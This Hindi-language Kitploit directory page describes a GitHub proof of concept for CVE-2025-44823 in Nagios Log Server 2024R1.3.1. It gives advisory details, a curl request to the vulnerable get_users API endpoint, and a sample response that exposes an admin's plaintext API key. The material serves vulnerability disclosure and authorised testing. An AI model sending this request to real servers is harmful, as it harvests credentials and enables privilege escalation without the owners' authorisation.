Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-44823 — Nagios Log Server 2024R1.3.1 में प्रमाणित API कुंजी एक्सपोज़र | Kitploit
उपकरण/GitHubGitHub/skraft9/cve-2025-44823
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणजानकारी एकत्र करनाप्रमाणीकरणAPI सुरक्षा
GitHubskraft9/cve-2025-44823

CVE-2025-44823

Nagios Log Server 2024R1.3.1 में प्रमाणित API कुंजी एक्सपोज़र

रिपॉजिटरी देखें
19 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Nagios Log Server 2024R1.3.1 में प्रमाणित एपीआई कुंजी एक्सपोज़र

▶️ PoC डेमो

CVE पहचानकर्ता: CVE-2025-44823

दिनांक: 2025-04-02

लेखक: Alex Tisdale, Seth Kraft

विक्रेता होमपेज: https://www.nagios.com/

विक्रेता परिवर्तन लॉग: https://www.nagios.com/changelog/#log-server

सॉफ्टवेयर लिंक: https://assets.nagios.com/downloads/nagios-log-server/versions.php

संस्करण: 2024R1.3.1 और नीचे

पर परीक्षण किया गया: Nagios Log Server 2024R1.3.1 (डिफ़ॉल्ट कॉन्फ़िगरेशन, Ubuntu 20.04)

CWE: CWE-497

CVSS: 9.8 CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

प्राधिकरण

केवल अनुसंधान और अधिकृत परीक्षण के लिए। कृपया अनुमति के बिना सिस्टम के खिलाफ उपयोग न करें।

विवरण

Nagios Log Server 2024R1.3.1 में एक API-स्तर की कमजोरी किसी भी उपयोगकर्ता को, जिसके पास वैध API टोकन है, उपयोगकर्ता खातों की पूरी सूची और उनके सादे पाठ में API कुंजियाँ प्राप्त करने की अनुमति देती है, जिसमें प्रशासक प्रमाणपत्र शामिल हैं। यह दोष उपयोगकर्ता गणना, विशेषाधिकार वृद्धि, और उजागर टोकन के अनधिकृत उपयोग के माध्यम से पूर्ण सिस्टम समझौता सक्षम बनाता है।

PoC

चरण 1: कमजोर एंडपॉइंट तक पहुँचें

root@kitploit:~
curl -X GET "http://<target-ip>/nagioslogserver/index.php/api/system/get_users?token=<valid_token>"

नमूना प्रतिक्रिया

root@kitploit:~
[
  {
    "name": "devadmin",
    "username": "devadmin",
    "email": "[email protected]",
    "apikey": "dcaa1693a79d651ebc29d45c879b3fbbc730d2de",
    "auth_type": "admin",
    ...
  }
]
टूल डाउनलोड करें